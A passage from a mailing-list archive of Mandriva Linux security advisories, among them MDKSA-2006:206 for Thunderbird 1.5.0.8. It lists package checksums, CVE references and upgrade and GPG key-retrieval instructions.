 8e114fec014131d472790035a1509783  2007.0/x86_64/mozilla-thunderbird-he-1.5.0.8-1.1mdv2007.0.x86_64.rpm
 3eda3b36a83c550a1f52faf6adfb0b10  2007.0/x86_64/mozilla-thunderbird-hu-1.5.0.8-1.1mdv2007.0.x86_64.rpm
 c336cc525567465d1649ee55c604d3a3  2007.0/x86_64/mozilla-thunderbird-it-1.5.0.8-1.1mdv2007.0.x86_64.rpm
 476f974ea2e3b9ef971231b8b08e62f0  2007.0/x86_64/mozilla-thunderbird-ja-1.5.0.8-1.1mdv2007.0.x86_64.rpm
 7878332de8134b9025b924315d6ffbf6  2007.0/x86_64/mozilla-thunderbird-ko-1.5.0.8-1.1mdv2007.0.x86_64.rpm
 7602f9099c26d60e934f54918dd38e46  2007.0/x86_64/mozilla-thunderbird-lt-1.5.0.8-1.1mdv2007.0.x86_64.rpm
 52ba4b91175db4376fd4c4e9018969c3  2007.0/x86_64/mozilla-thunderbird-mk-1.5.0.8-1.1mdv2007.0.x86_64.rpm
 1e2bc31ee83c5c47f06953aba976a27d  2007.0/x86_64/mozilla-thunderbird-nb-1.5.0.8-1.1mdv2007.0.x86_64.rpm
 47b180beb65802e89f7e6a8be7f33d15  2007.0/x86_64/mozilla-thunderbird-nl-1.5.0.8-1.1mdv2007.0.x86_64.rpm
 6485a71b5d07fef3e337630aa53bb4c6  2007.0/x86_64/mozilla-thunderbird-pa_IN-1.5.0.8-1.1mdv2007.0.x86_64.rpm
 6b5df9cad533fc75fc47191df5f3dabf  2007.0/x86_64/mozilla-thunderbird-pl-1.5.0.8-1.1mdv2007.0.x86_64.rpm
 99b61d660a72eff639f78ec0422aeaf2  2007.0/x86_64/mozilla-thunderbird-pt_BR-1.5.0.8-1.1mdv2007.0.x86_64.rpm
 99cfe247978fe85b5b5186bf12247f3a  2007.0/x86_64/mozilla-thunderbird-ru-1.5.0.8-1.1mdv2007.0.x86_64.rpm
 8c393629997cea717c2f1e8d077a9344  2007.0/x86_64/mozilla-thunderbird-sk-1.5.0.8-1.1mdv2007.0.x86_64.rpm
 be518e4b4833e6cb9d083871101be35b  2007.0/x86_64/mozilla-thunderbird-sl-1.5.0.8-1.1mdv2007.0.x86_64.rpm
 8dedff0ffd0e7b7721b256f01821f188  2007.0/x86_64/mozilla-thunderbird-sv-1.5.0.8-1.1mdv2007.0.x86_64.rpm
 05202d61506a60981fb9a317ce6a5d5d  2007.0/x86_64/mozilla-thunderbird-tr-1.5.0.8-1.1mdv2007.0.x86_64.rpm
 0deda88ec857fb0c11b57555814a20ec  2007.0/x86_64/mozilla-thunderbird-zh_CN-1.5.0.8-1.1mdv2007.0.x86_64.rpm
 0f2f7928b2edfbe0ae5faf127b0ed066  2007.0/x86_64/nsinstall-1.5.0.8-1.1mdv2007.0.x86_64.rpm 
 e408368ca02e7efbbece9adbaaea7d56  2007.0/SRPMS/mozilla-thunderbird-1.5.0.8-1.1mdv2007.0.src.rpm
 7867a124b85e4a8098ec7b814267c1f5  2007.0/SRPMS/mozilla-thunderbird-enigmail-l10n-1.5.0.8-1.1mdv2007.0.src.rpm
 e776e0c4c5a6ff592af0c346bf8b4511  2007.0/SRPMS/mozilla-thunderbird-l10n-1.5.0.8-1.1mdv2007.0.src.rpm

 Corporate 3.0:
 71192ef0a8bd28533718191d287d8158  corporate/3.0/i586/mozilla-thunderbird-1.5.0.8-1.1.C30mdk.i586.rpm
 c0121a4a0192d7944b1f8d30c977ab38  corporate/3.0/i586/mozilla-thunderbird-bg-1.5.0.8-1.1.C30mdk.i586.rpm
 53c403f48cb8547f0eb646ab1b41b656  corporate/3.0/i586/mozilla-thunderbird-ca-1.5.0.8-1.1.C30mdk.i586.rpm
 032ebcc12942292620b05929e0583f3a  corporate/3.0/i586/mozilla-thunderbird-cs-1.5.0.8-1.1.C30mdk.i586.rpm
 c88d6e26aa75dab433abcf71f2962e5c  corporate/3.0/i586/mozilla-thunderbird-da-1.5.0.8-1.1.C30mdk.i586.rpm
 dcc54cb45829470f4267806696b46eca  corporate/3.0/i586/mozilla-thunderbird-de-1.5.0.8-1.1.C30mdk.i586.rpm
 e7ba899422d7cbfd343659b810e4ee52  corporate/3.0/i586/mozilla-thunderbird-devel-1.5.0.8-1.1.C30mdk.i586.rpm
 d987b44bd201c2a23b404751e13df538  corporate/3.0/i586/mozilla-thunderbird-el-1.5.0.8-1.1.C30mdk.i586.rpm
 9d496fa524a5226676f56ed87d2015ec  corporate/3.0/i586/mozilla-thunderbird-enigmail-1.5.0.8-1.1.C30mdk.i586.rpm
 eac64993c47963ede70eca5fb62e30b9  corporate/3.0/i586/mozilla-thunderbird-enigmail-ca-1.5.0.8-1.1.C30mdk.i586.rpm
 b5523fcbf2370d1805e1f917faaa31c8  corporate/3.0/i586/mozilla-thunderbird-enigmail-cs-1.5.0.8-1.1.C30mdk.i586.rpm
 1eb806fe5a429b52f010e16aeed4cb4a  corporate/3.0/i586/mozilla-thunderbird-enigmail-de-1.5.0.8-1.1.C30mdk.i586.rpm
 1a8da00f3e4033ec813df4548072ac9f  corporate/3.0/i586/mozilla-thunderbird-enigmail-el-1.5.0.8-1.1.C30mdk.i586.rpm
 3a2434c868a3b5799cb69c31d43f900c  corporate/3.0/i586/mozilla-thunderbird-enigmail-es-1.5.0.8-1.1.C30mdk.i586.rpm
 a1bb48121d53f83bf0efd303ea477b71  corporate/3.0/i586/mozilla-thunderbird-enigmail-es_AR-1.5.0.8-1.1.C30mdk.i586.rpm
 6f9d308c194ae42cfa0787afdebff2cc  corporate/3.0/i586/mozilla-thunderbird-enigmail-fi-1.5.0.8-1.1.C30mdk.i586.rpm
 bb3c3cf4056814131f8031471c81ac6f  corporate/3.0/i586/mozilla-thunderbird-enigmail-fr-1.5.0.8-1.1.C30mdk.i586.rpm
 4228aaf098c501a80af97469393482b5  corporate/3.0/i586/mozilla-thunderbird-enigmail-hu-1.5.0.8-1.1.C30mdk.i586.rpm
 3a95ad54416e2f002d1aaa32557cf947  corporate/3.0/i586/mozilla-thunderbird-enigmail-it-1.5.0.8-1.1.C30mdk.i586.rpm
 19e1eac0351d89760ee31b4c9ee4fcc4  corporate/3.0/i586/mozilla-thunderbird-enigmail-ja-1.5.0.8-1.1.C30mdk.i586.rpm
 1c21de0415bd0223237aa82795cc9600  corporate/3.0/i586/mozilla-thunderbird-enigmail-nb-1.5.0.8-1.1.C30mdk.i586.rpm
 a11487e4145c294a57a77491f6996748  corporate/3.0/i586/mozilla-thunderbird-enigmail-nl-1.5.0.8-1.1.C30mdk.i586.rpm
 31064002ac59d4857c3c45c3161580dc  corporate/3.0/i586/mozilla-thunderbird-enigmail-pl-1.5.0.8-1.1.C30mdk.i586.rpm
 fc88eeba422b084ffa67b77211248ef0  corporate/3.0/i586/mozilla-thunderbird-enigmail-pt-1.5.0.8-1.1.C30mdk.i586.rpm
 4ead83e3405e7469370b4f02a9254ddc  corporate/3.0/i586/mozilla-thunderbird-enigmail-pt_BR-1.5.0.8-1.1.C30mdk.i586.rpm
 3a15b707a6d7f8e9b25c1ccaea023333  corporate/3.0/i586/mozilla-thunderbird-enigmail-ru-1.5.0.8-1.1.C30mdk.i586.rpm
 1a8c565fd3b42069b2e42103d98dfab2  corporate/3.0/i586/mozilla-thunderbird-enigmail-sk-1.5.0.8-1.1.C30mdk.i586.rpm
 0040d479d7e55304c06df39b2233d12e  corporate/3.0/i586/mozilla-thunderbird-enigmail-sl-1.5.0.8-1.1.C30mdk.i586.rpm
 6fab1321b377748e22a6709b772d5159  corporate/3.0/i586/mozilla-thunderbird-enigmail-sv-1.5.0.8-1.1.C30mdk.i586.rpm
 1969ec5d6cc27df2f09f9733b5b37c6d  corporate/3.0/i586/mozilla-thunderbird-enigmail-zh_CN-1.5.0.8-1.1.C30mdk.i586.rpm
 0c34a8e8bd3f9011283fe990771a857a  corporate/3.0/i586/mozilla-thunderbird-es-1.5.0.8-1.1.C30mdk.i586.rpm
 68781ca20e2232457046bdab86b59462  corporate/3.0/i586/mozilla-thunderbird-es_AR-1.5.0.8-1.1.C30mdk.i586.rpm
 37c3909b8feb9a35208519ccf4ec8a46  corporate/3.0/i586/mozilla-thunderbird-eu-1.5.0.8-1.1.C30mdk.i586.rpm
 ea2febd0e93d9348fd580452f7adc0be  corporate/3.0/i586/mozilla-thunderbird-fi-1.5.0.8-1.1.C30mdk.i586.rpm
 2eac2aaeb4fe209f98aa85505f6a9b87  corporate/3.0/i586/mozilla-thunderbird-fr-1.5.0.8-1.1.C30mdk.i586.rpm
 d8d8fc30075f0848859cbe96b26404a7  corporate/3.0/i586/mozilla-thunderbird-ga-1.5.0.8-1.1.C30mdk.i586.rpm
 3af19a8b01fb316451132e6460c7deb0  corporate/3.0/i586/mozilla-thunderbird-gu_IN-1.5.0.8-1.1.C30mdk.i586.rpm
 f7aed893e50dff94f47d658d70093824  corporate/3.0/i586/mozilla-thunderbird-he-1.5.0.8-1.1.C30mdk.i586.rpm
 ab6ead860edf6de4935aa3bb4ecf4721  corporate/3.0/i586/mozilla-thunderbird-hu-1.5.0.8-1.1.C30mdk.i586.rpm
 a9b0bc2b2bcf186b5a284cba3d6cad19  corporate/3.0/i586/mozilla-thunderbird-it-1.5.0.8-1.1.C30mdk.i586.rpm
 373554b2032c20a61c48f4a4e11e5b57  corporate/3.0/i586/mozilla-thunderbird-ja-1.5.0.8-1.1.C30mdk.i586.rpm
 1a2efc51627d9f55929e1b33e20f5274  corporate/3.0/i586/mozilla-thunderbird-ko-1.5.0.8-1.1.C30mdk.i586.rpm
 27ab1d70b317c477b56df8223a8477b4  corporate/3.0/i586/mozilla-thunderbird-lt-1.5.0.8-1.1.C30mdk.i586.rpm
 0bcd50b34bec84016747f4919b43b8e1  corporate/3.0/i586/mozilla-thunderbird-mk-1.5.0.8-1.1.C30mdk.i586.rpm
 4b26e1653ccf78604c16b25ed7357dfb  corporate/3.0/i586/mozilla-thunderbird-nb-1.5.0.8-1.1.C30mdk.i586.rpm
 ea1a0d0349f9a2f26b23c7678d7e5736  corporate/3.0/i586/mozilla-thunderbird-nl-1.5.0.8-1.1.C30mdk.i586.rpm
 7d7c13e7a820c069b3c657adf57443d9  corporate/3.0/i586/mozilla-thunderbird-pa_IN-1.5.0.8-1.1.C30mdk.i586.rpm
 ef0755e523de702c802890f494ee5ea0  corporate/3.0/i586/mozilla-thunderbird-pl-1.5.0.8-1.1.C30mdk.i586.rpm
 f7618d53bff6c0764297f2352c5d0239  corporate/3.0/i586/mozilla-thunderbird-pt_BR-1.5.0.8-1.1.C30mdk.i586.rpm
 8df8db645153b5f7539044d5f892ad54  corporate/3.0/i586/mozilla-thunderbird-ru-1.5.0.8-1.1.C30mdk.i586.rpm
 d26cb2fbb5301bcf127ea4e4606f52b9  corporate/3.0/i586/mozilla-thunderbird-sk-1.5.0.8-1.1.C30mdk.i586.rpm
 f57d3dd11471a798542b87f0a3c68e82  corporate/3.0/i586/mozilla-thunderbird-sl-1.5.0.8-1.1.C30mdk.i586.rpm
 f3aede5440aeb78b59350fe56bb221d2  corporate/3.0/i586/mozilla-thunderbird-sv-1.5.0.8-1.1.C30mdk.i586.rpm
 bda7588d80565c17190fb407bdc3b1b2  corporate/3.0/i586/mozilla-thunderbird-tr-1.5.0.8-1.1.C30mdk.i586.rpm
 5f0764d5685d0836bd718fdc86b8a73a  corporate/3.0/i586/mozilla-thunderbird-zh_CN-1.5.0.8-1.1.C30mdk.i586.rpm
 2a1892c7e027dba761df43c98bb5e85f  corporate/3.0/i586/nsinstall-1.5.0.8-1.1.C30mdk.i586.rpm 
 04cdbf8cd4c1b9baf1b1c34e0c7bfcb9  corporate/3.0/SRPMS/mozilla-thunderbird-1.5.0.8-1.1.C30mdk.src.rpm
 98c5a4c000178cf57677fa6ee70adb71  corporate/3.0/SRPMS/mozilla-thunderbird-enigmail-l10n-1.5.0.8-1.1.C30mdk.src.rpm
 124ecce0dd9a26b565eef6c2f7e14401  corporate/3.0/SRPMS/mozilla-thunderbird-l10n-1.5.0.8-1.1.C30mdk.src.rpm

 Corporate 3.0/X86_64:
 c109965ada094232d0958a8121be977a  corporate/3.0/x86_64/mozilla-thunderbird-1.5.0.8-1.1.C30mdk.x86_64.rpm
 e50d4054e85e4624b285067c75cfab18  corporate/3.0/x86_64/mozilla-thunderbird-bg-1.5.0.8-1.1.C30mdk.x86_64.rpm
 f8cc5e4a36961ef4db2b8632fc6734d9  corporate/3.0/x86_64/mozilla-thunderbird-ca-1.5.0.8-1.1.C30mdk.x86_64.rpm
 70e0a1878ce810ee835e7eca08a11e12  corporate/3.0/x86_64/mozilla-thunderbird-cs-1.5.0.8-1.1.C30mdk.x86_64.rpm
 50abb11664ca02e6d77cbf30396e5398  corporate/3.0/x86_64/mozilla-thunderbird-da-1.5.0.8-1.1.C30mdk.x86_64.rpm
 5565876286c51872fb0ff90df059f052  corporate/3.0/x86_64/mozilla-thunderbird-de-1.5.0.8-1.1.C30mdk.x86_64.rpm
 cdd3892a5ba2a7c1ffe29d009e9d23a9  corporate/3.0/x86_64/mozilla-thunderbird-devel-1.5.0.8-1.1.C30mdk.x86_64.rpm
 ba3e7a92e79e00cd74b722ab94d832eb  corporate/3.0/x86_64/mozilla-thunderbird-el-1.5.0.8-1.1.C30mdk.x86_64.rpm
 c11927081645df376c72f27e8ebc6a85  corporate/3.0/x86_64/mozilla-thunderbird-enigmail-1.5.0.8-1.1.C30mdk.x86_64.rpm
 448172b7c753b48c81b2a2c5d337b9e5  corporate/3.0/x86_64/mozilla-thunderbird-enigmail-ca-1.5.0.8-1.1.C30mdk.x86_64.rpm
 b83c0eb2158672f087fd5754ca27efad  corporate/3.0/x86_64/mozilla-thunderbird-enigmail-cs-1.5.0.8-1.1.C30mdk.x86_64.rpm
 49b91f3eae7a0773ecce62f635a6dfe9  corporate/3.0/x86_64/mozilla-thunderbird-enigmail-de-1.5.0.8-1.1.C30mdk.x86_64.rpm
 3a0cf5325721e29c4eba9ee7cbc7efb7  corporate/3.0/x86_64/mozilla-thunderbird-enigmail-el-1.5.0.8-1.1.C30mdk.x86_64.rpm
 cadf1aff1e915adb9e14539eb04521db  corporate/3.0/x86_64/mozilla-thunderbird-enigmail-es-1.5.0.8-1.1.C30mdk.x86_64.rpm
 8218118b837bf05b3603652f0d4c5690  corporate/3.0/x86_64/mozilla-thunderbird-enigmail-es_AR-1.5.0.8-1.1.C30mdk.x86_64.rpm
 7c7190fc9ec1fc5774436ec7b0c92fd5  corporate/3.0/x86_64/mozilla-thunderbird-enigmail-fi-1.5.0.8-1.1.C30mdk.x86_64.rpm
 a42f63c64470ba933d6239bdf8b1569c  corporate/3.0/x86_64/mozilla-thunderbird-enigmail-fr-1.5.0.8-1.1.C30mdk.x86_64.rpm
 af8c5d7e3569278f3e9d364362be25b3  corporate/3.0/x86_64/mozilla-thunderbird-enigmail-hu-1.5.0.8-1.1.C30mdk.x86_64.rpm
 c749a5b7ac03ad98919f83425fcbd4c2  corporate/3.0/x86_64/mozilla-thunderbird-enigmail-it-1.5.0.8-1.1.C30mdk.x86_64.rpm
 ac82cd1f4fc0c5ed57be5b165cc65be4  corporate/3.0/x86_64/mozilla-thunderbird-enigmail-ja-1.5.0.8-1.1.C30mdk.x86_64.rpm
 0fbd67977bdfc1b1f9aa3c846c80c244  corporate/3.0/x86_64/mozilla-thunderbird-enigmail-nb-1.5.0.8-1.1.C30mdk.x86_64.rpm
 4d26f0c7b32d3888e1e5c4c14516a4df  corporate/3.0/x86_64/mozilla-thunderbird-enigmail-nl-1.5.0.8-1.1.C30mdk.x86_64.rpm
 37fbc8358f1f11d5cb9f0e9b2fab3b26  corporate/3.0/x86_64/mozilla-thunderbird-enigmail-pl-1.5.0.8-1.1.C30mdk.x86_64.rpm
 6bec775a601e84be547246ae5638d059  corporate/3.0/x86_64/mozilla-thunderbird-enigmail-pt-1.5.0.8-1.1.C30mdk.x86_64.rpm
 0dc1c40ef6d1a233661048447db25543  corporate/3.0/x86_64/mozilla-thunderbird-enigmail-pt_BR-1.5.0.8-1.1.C30mdk.x86_64.rpm
 7ec948cc8df84aae6b3d660bd4187208  corporate/3.0/x86_64/mozilla-thunderbird-enigmail-ru-1.5.0.8-1.1.C30mdk.x86_64.rpm
 4b7ba48ffeff51709b26c8f315a4aaa1  corporate/3.0/x86_64/mozilla-thunderbird-enigmail-sk-1.5.0.8-1.1.C30mdk.x86_64.rpm
 94fceae9b7bc6d48fe2677eecaaf11a6  corporate/3.0/x86_64/mozilla-thunderbird-enigmail-sl-1.5.0.8-1.1.C30mdk.x86_64.rpm
 d578499c38c981f2b8cc55fc1351efef  corporate/3.0/x86_64/mozilla-thunderbird-enigmail-sv-1.5.0.8-1.1.C30mdk.x86_64.rpm
 095291274be4a418d05c4e96cb441d90  corporate/3.0/x86_64/mozilla-thunderbird-enigmail-zh_CN-1.5.0.8-1.1.C30mdk.x86_64.rpm
 272b554e86966e103d3e7f42b5cba9db  corporate/3.0/x86_64/mozilla-thunderbird-es-1.5.0.8-1.1.C30mdk.x86_64.rpm
 52bd52c4d5eaad6fa541dd20db5411d0  corporate/3.0/x86_64/mozilla-thunderbird-es_AR-1.5.0.8-1.1.C30mdk.x86_64.rpm
 2536b28aa209a912ff74601db4e685b4  corporate/3.0/x86_64/mozilla-thunderbird-eu-1.5.0.8-1.1.C30mdk.x86_64.rpm
 484ad35799b9a8cd277754bf1b13d686  corporate/3.0/x86_64/mozilla-thunderbird-fi-1.5.0.8-1.1.C30mdk.x86_64.rpm
 42ff5a3a8320c4be3ffb1f1d74912f78  corporate/3.0/x86_64/mozilla-thunderbird-fr-1.5.0.8-1.1.C30mdk.x86_64.rpm
 8a46a1d9f9380c205699ce090d749ff2  corporate/3.0/x86_64/mozilla-thunderbird-ga-1.5.0.8-1.1.C30mdk.x86_64.rpm
 3c30c5aeee783bfabe34fb1ff7357d38  corporate/3.0/x86_64/mozilla-thunderbird-gu_IN-1.5.0.8-1.1.C30mdk.x86_64.rpm
 a90b14f77d6eed2228bfa55457803f6f  corporate/3.0/x86_64/mozilla-thunderbird-he-1.5.0.8-1.1.C30mdk.x86_64.rpm
 719239492f7d93b04f2c95902fccf94c  corporate/3.0/x86_64/mozilla-thunderbird-hu-1.5.0.8-1.1.C30mdk.x86_64.rpm
 f52bcdf19f10745e756f0d58616126df  corporate/3.0/x86_64/mozilla-thunderbird-it-1.5.0.8-1.1.C30mdk.x86_64.rpm
 79826e403152cbe90ddf3bd4d8d64abe  corporate/3.0/x86_64/mozilla-thunderbird-ja-1.5.0.8-1.1.C30mdk.x86_64.rpm
 18c08993c8f43c976be6cf2e8cfb2c35  corporate/3.0/x86_64/mozilla-thunderbird-ko-1.5.0.8-1.1.C30mdk.x86_64.rpm
 b17866029fe4244a77af59fbb55a07b9  corporate/3.0/x86_64/mozilla-thunderbird-lt-1.5.0.8-1.1.C30mdk.x86_64.rpm
 878f59fdb3ebb5929fc23437a17fb5ad  corporate/3.0/x86_64/mozilla-thunderbird-mk-1.5.0.8-1.1.C30mdk.x86_64.rpm
 d62fb25dc173e8b12be8623ae8fbf9bf  corporate/3.0/x86_64/mozilla-thunderbird-nb-1.5.0.8-1.1.C30mdk.x86_64.rpm
 266322718c7cedd78e89524940f15d55  corporate/3.0/x86_64/mozilla-thunderbird-nl-1.5.0.8-1.1.C30mdk.x86_64.rpm
 32c5fcab859aff66aaf704b997a1c625  corporate/3.0/x86_64/mozilla-thunderbird-pa_IN-1.5.0.8-1.1.C30mdk.x86_64.rpm
 17d7eeb0fbd25df1f76d5fa875ef7a3d  corporate/3.0/x86_64/mozilla-thunderbird-pl-1.5.0.8-1.1.C30mdk.x86_64.rpm
 4aabd47a35cb15547ccbe4eda1b521e8  corporate/3.0/x86_64/mozilla-thunderbird-pt_BR-1.5.0.8-1.1.C30mdk.x86_64.rpm
 1d8d27be2902605b0eae9dcbd89654cc  corporate/3.0/x86_64/mozilla-thunderbird-ru-1.5.0.8-1.1.C30mdk.x86_64.rpm
 6c116048a69b3c176831fde5ff0a252a  corporate/3.0/x86_64/mozilla-thunderbird-sk-1.5.0.8-1.1.C30mdk.x86_64.rpm
 e5bcb8518c5a61e63e62f90c363c67ae  corporate/3.0/x86_64/mozilla-thunderbird-sl-1.5.0.8-1.1.C30mdk.x86_64.rpm
 5569afdd940d28bdf37a1003d5d5d6b0  corporate/3.0/x86_64/mozilla-thunderbird-sv-1.5.0.8-1.1.C30mdk.x86_64.rpm
 d00245da432be7a7d268846891555930  corporate/3.0/x86_64/mozilla-thunderbird-tr-1.5.0.8-1.1.C30mdk.x86_64.rpm
 ee130a70f9b1fe5719fea63963f3db6d  corporate/3.0/x86_64/mozilla-thunderbird-zh_CN-1.5.0.8-1.1.C30mdk.x86_64.rpm
 81f41bebeb9eca34d7c27ab81ca41af6  corporate/3.0/x86_64/nsinstall-1.5.0.8-1.1.C30mdk.x86_64.rpm 
 04cdbf8cd4c1b9baf1b1c34e0c7bfcb9  corporate/3.0/SRPMS/mozilla-thunderbird-1.5.0.8-1.1.C30mdk.src.rpm
 98c5a4c000178cf57677fa6ee70adb71  corporate/3.0/SRPMS/mozilla-thunderbird-enigmail-l10n-1.5.0.8-1.1.C30mdk.src.rpm
 124ecce0dd9a26b565eef6c2f7e14401  corporate/3.0/SRPMS/mozilla-thunderbird-l10n-1.5.0.8-1.1.C30mdk.src.rpm
 _______________________________________________________________________

 To upgrade automatically use MandrivaUpdate or urpmi.  The verification
 of md5 checksums and GPG signatures is performed automatically for you.

 All packages are signed by Mandriva for security.  You can obtain the
 GPG public key of the Mandriva Security Team by executing:

  gpg --recv-keys --keyserver pgp.mit.edu 0x22458A98

 You can view other update advisories for Mandriva Linux at:

  http://www.mandriva.com/security/advisories

 If you want to report vulnerabilities, please contact

  security_(at)_mandriva.com
 _______________________________________________________________________

 Type Bits/KeyID     Date       User ID
 pub  1024D/22458A98 2000-07-10 Mandriva Security Team
  
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.2.2 (GNU/Linux)

iD8DBQFFU42GmqjQ0CJFipgRAiJgAKDQ8K7lgpOsNzXOQcSOrfcVrHQ4sACeLaqm
75x+jP9FNzlE7ieAV3r7Czs=
=DdKu
-----END PGP SIGNATURE-----



From security at mandriva.com  Fri Dec 15 21:31:51 2006
From: security at mandriva.com (security at mandriva.com)
Date: Fri, 15 Dec 2006 14:31:51 -0700
Subject: [Full-disclosure] [ MDKSA-2006:206 ] - Updated Thunderbird packages
	fix multiple vulnerabilities
Message-ID: 


-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

 _______________________________________________________________________
 
 Mandriva Linux Security Advisory                         MDKSA-2006:206
 http://www.mandriva.com/security/
 _______________________________________________________________________
 
 Package : mozilla-thunderbird
 Date    : November 9, 2006
 Affected: 2007.0, Corporate 3.0
 _______________________________________________________________________
 
 Problem Description:
 
 A number of security vulnerabilities have been discovered and corrected
 in the latest Mozilla Thunderbird program, version 1.5.0.8.

 This update provides the latest Thunderbird to correct these issues.
 _______________________________________________________________________

 References:
 
 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-5462
 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-5463
 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-5464
 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-5747
 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-5748
 http://www.mozilla.org/security/announce/2006/mfsa2006-65.html
 http://www.mozilla.org/security/announce/2006/mfsa2006-66.html
 http://www.mozilla.org/security/announce/2006/mfsa2006-67.html
 _______________________________________________________________________
 
 Updated Packages:
 
 Mandriva Linux 2007.0:
 488e65dfe45ecf7e3a9e1a3dedd5c2ce  2007.0/i586/mozilla-thunderbird-1.5.0.8-1.1mdv2007.0.i586.rpm
 5e551ab45061148722dda1d7ce66959e  2007.0/i586/mozilla-thunderbird-bg-1.5.0.8-1.1mdv2007.0.i586.rpm
 2149a7fd629b8bc6843c6fdf1bb49efb  2007.0/i586/mozilla-thunderbird-ca-1.5.0.8-1.1mdv2007.0.i586.rpm
 0d2315b490e3b8dd2ab791bd6c3ee516  2007.0/i586/mozilla-thunderbird-cs-1.5.0.8-1.1mdv2007.0.i586.rpm
 d5583d1b99b948c90e1cad62d753d67d  2007.0/i586/mozilla-thunderbird-da-1.5.0.8-1.1mdv2007.0.i586.rpm
 00ec607c39d3de4c589997d6c7ee6679  2007.0/i586/mozilla-thunderbird-de-1.5.0.8-1.1mdv2007.0.i586.rpm
 6d1f0f2576362a0bb90b4f9d8c4f2153  2007.0/i586/mozilla-thunderbird-devel-1.5.0.8-1.1mdv2007.0.i586.rpm
 2cb0e44d2e3f7fddd60249843204403f  2007.0/i586/mozilla-thunderbird-el-1.5.0.8-1.1mdv2007.0.i586.rpm
 0c3c771882698d5651775aeed24bfd73  2007.0/i586/mozilla-thunderbird-enigmail-1.5.0.8-1.1mdv2007.0.i586.rpm
 477ca905391c1d555d0136d46d557869  2007.0/i586/mozilla-thunderbird-enigmail-ca-1.5.0.8-1.1mdv2007.0.i586.rpm
 741811dd392d942b27e1b3b0de695d4e  2007.0/i586/mozilla-thunderbird-enigmail-cs-1.5.0.8-1.1mdv2007.0.i586.rpm
 7c2c4922c6a2c6ce2cb6108a95f7dbfa  2007.0/i586/mozilla-thunderbird-enigmail-de-1.5.0.8-1.1mdv2007.0.i586.rpm
 7cbf9f3218d587ef97edf01f2298096b  2007.0/i586/mozilla-thunderbird-enigmail-el-1.5.0.8-1.1mdv2007.0.i586.rpm
 7dbd9e4c16db82a761a7b502c1f7f22d  2007.0/i586/mozilla-thunderbird-enigmail-es-1.5.0.8-1.1mdv2007.0.i586.rpm
 b6dd6119216f6b748ee7c1570c3b8c37  2007.0/i586/mozilla-thunderbird-enigmail-es_AR-1.5.0.8-1.1mdv2007.0.i586.rpm
 1eea732e08ca0ef96796c3f50abb1f77  2007.0/i586/mozilla-thunderbird-enigmail-fi-1.5.0.8-1.1mdv2007.0.i586.rpm
 e1cc5cf2496581d776bb43e2f0dbbea6  2007.0/i586/mozilla-thunderbird-enigmail-fr-1.5.0.8-1.1mdv2007.0.i586.rpm
 af86ce82ff9053250f82f2215c8dd7e5  2007.0/i586/mozilla-thunderbird-enigmail-hu-1.5.0.8-1.1mdv2007.0.i586.rpm
 6319633c561c7f68c6614685126da02b  2007.0/i586/mozilla-thunderbird-enigmail-it-1.5.0.8-1.1mdv2007.0.i586.rpm
 56387829c6cc83882246e68e3b8704b0  2007.0/i586/mozilla-thunderbird-enigmail-ja-1.5.0.8-1.1mdv2007.0.i586.rpm
 56cb838bb0c375f53d3cff2eb76a1118  2007.0/i586/mozilla-thunderbird-enigmail-nb-1.5.0.8-1.1mdv2007.0.i586.rpm
 253500598ff56ab85394e68708ace21d  2007.0/i586/mozilla-thunderbird-enigmail-nl-1.5.0.8-1.1mdv2007.0.i586.rpm
 53b4d4f1aa4e8174a33a0ed436ce961a  2007.0/i586/mozilla-thunderbird-enigmail-pl-1.5.0.8-1.1mdv2007.0.i586.rpm
 fb9dd6933d27029538cd01a64ec55cee  2007.0/i586/mozilla-thunderbird-enigmail-pt-1.5.0.8-1.1mdv2007.0.i586.rpm
 701b9837303a3ed79e6c74c037c28926  2007.0/i586/mozilla-thunderbird-enigmail-pt_BR-1.5.0.8-1.1mdv2007.0.i586.rpm
 b3739c1344770e92864c50f131f08884  2007.0/i586/mozilla-thunderbird-enigmail-ru-1.5.0.8-1.1mdv2007.0.i586.rpm
 1efe7ebc2a71e2f2d6c2785026a6e7ac  2007.0/i586/mozilla-thunderbird-enigmail-sk-1.5.0.8-1.1mdv2007.0.i586.rpm
 6860352b37999652aab785a266673e2f  2007.0/i586/mozilla-thunderbird-enigmail-sl-1.5.0.8-1.1mdv2007.0.i586.rpm
 51abe323b14793097935b0c221e64f71  2007.0/i586/mozilla-thunderbird-enigmail-sv-1.5.0.8-1.1mdv2007.0.i586.rpm
 b8ec884437a460c9fbb5c71db6a46c31  2007.0/i586/mozilla-thunderbird-enigmail-zh_CN-1.5.0.8-1.1mdv2007.0.i586.rpm
 9ae4fb1871ee29f3f7b52210c0cf4e1b  2007.0/i586/mozilla-thunderbird-es-1.5.0.8-1.1mdv2007.0.i586.rpm
 e1a31b03ffef8e86df09579296fce3c9  2007.0/i586/mozilla-thunderbird-es_AR-1.5.0.8-1.1mdv2007.0.i586.rpm
 6b4bdbb4648231b128655e56015621c7  2007.0/i586/mozilla-thunderbird-eu-1.5.0.8-1.1mdv2007.0.i586.rpm
 d333252ee1ba51351762e4050565ecb1  2007.0/i586/mozilla-thunderbird-fi-1.5.0.8-1.1mdv2007.0.i586.rpm
 0a2828dbab70a2be0e721cc016f93d7f  2007.0/i586/mozilla-thunderbird-fr-1.5.0.8-1.1mdv2007.0.i586.rpm
 defa2ac291c66f693946362bd2501c40  2007.0/i586/mozilla-thunderbird-ga-1.5.0.8-1.1mdv2007.0.i586.rpm
 c5540aa8289eefbf3e708e442de77aa8  2007.0/i586/mozilla-thunderbird-gu_IN-1.5.0.8-1.1mdv2007.0.i586.rpm
 45da9968c4661ef994ef1dcefd0ad54f  2007.0/i586/mozilla-thunderbird-he-1.5.0.8-1.1mdv2007.0.i586.rpm
 df8d2ea1013a65457aa1f2100060d968  2007.0/i586/mozilla-thunderbird-hu-1.5.0.8-1.1mdv2007.0.i586.rpm
 f87f2441b2ca36d4f5c3f3f2dd04b3bb  2007.0/i586/mozilla-thunderbird-it-1.5.0.8-1.1mdv2007.0.i586.rpm
 bc3a281fbc5c09b7f962dfb1d3b9e517  2007.0/i586/mozilla-thunderbird-ja-1.5.0.8-1.1mdv2007.0.i586.rpm
